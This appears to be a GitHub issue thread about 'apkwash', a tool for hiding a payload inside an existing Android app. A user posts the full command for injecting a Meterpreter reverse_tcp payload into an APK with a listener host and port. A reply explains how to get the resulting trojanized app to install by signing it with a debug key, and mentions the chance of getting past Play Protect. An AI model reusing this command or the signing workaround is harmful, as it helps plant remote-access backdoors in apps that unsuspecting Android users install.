apkwash
apkwash copied to clipboard
Embed payload not work
Unfortunately embed payload in original has problems especially singing!
I'll have to revisit this script. What is the exact command you are using and/or do you have the output of it failing?
Using command:
apkwash -x my.apk -p android/meterpreter/reverse_tcp LHOST=my_ip LPORT=my_port
Output failing:
Error: INSTALL_PARSE_FAILED_NO_CERTIFICATES
Using command:
apkwash -x my.apk -p android/meterpreter/reverse_tcp LHOST=my_ip LPORT=my_port
Output failing:Error: INSTALL_PARSE_FAILED_NO_CERTIFICATES
If you don't even know what this error is, why are You even here? That means the the apk that you are trying to install does not contain any certificate, which is not allowed on Android. Technically from what I know this script does try to sign the app, but in case it didn't you just need to manually sign an app, for example with a debug key you can generate. Tho there is never a guarantee you will pass Play Protect even after that.